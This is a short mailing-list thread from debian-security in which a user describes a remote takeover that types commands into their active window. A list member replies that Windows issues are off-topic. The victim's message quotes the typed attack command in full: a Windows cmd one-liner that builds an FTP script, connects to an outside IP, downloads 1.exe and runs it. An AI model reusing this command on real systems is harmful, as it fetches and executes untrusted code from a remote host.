Re: spooky windows script
> Well,
>
> to specify on this, I am running Debian testing, and surfing with Firefox 2.0.
>
> The script gets typed in any window that's active at the moment the cursor is being taken over: it may be the Firefox 'find'-field or a terminal window for that matter.
>
> I've checked my filesystem and no 1.exe file seems to be present.
>
> My IP-address is assigned dynamically by my ISP; it differs every time I log in. But I do have vino-server running. I'm going to check on that.
>
> thanks
>
> > Datum: 08/05/07 04:15 PM
> > Van: "David Clymer" <david@hrcsb.org>
> > Aan: debian-security@lists.debian.org
> > CC:
> > Onderwerp : Re: spooky windows script
> >
> > On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
> > > Hello,
> > >
> > > Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> > >
> > > %systemroot%\system32\cmd.exe
> > > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> > >
> > > (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> > >
> > > After that all is back to normal.
> > >
> > > Now this is of course a nuisance, but is it also a thread? And what can be done against it?
> > >
> > > Anybody got a clue on this?
> > >
> >
> > I'm sure someone has a clue. However, clued listmembers or not, a
> > windows security issue is not an appropriate topic for discussion on a
> > mailing list called "debian-security". As the name implies, this list is
> > for discussing security issues as they relate to the Debian GNU/Linux
> > distribution.
> >
> > -davidc
> >
> > --
> > A good hot dog feeds the hand that bites it.
> >
> >
> > --
> > To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
> > with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
> >
> >
> >
Reply to: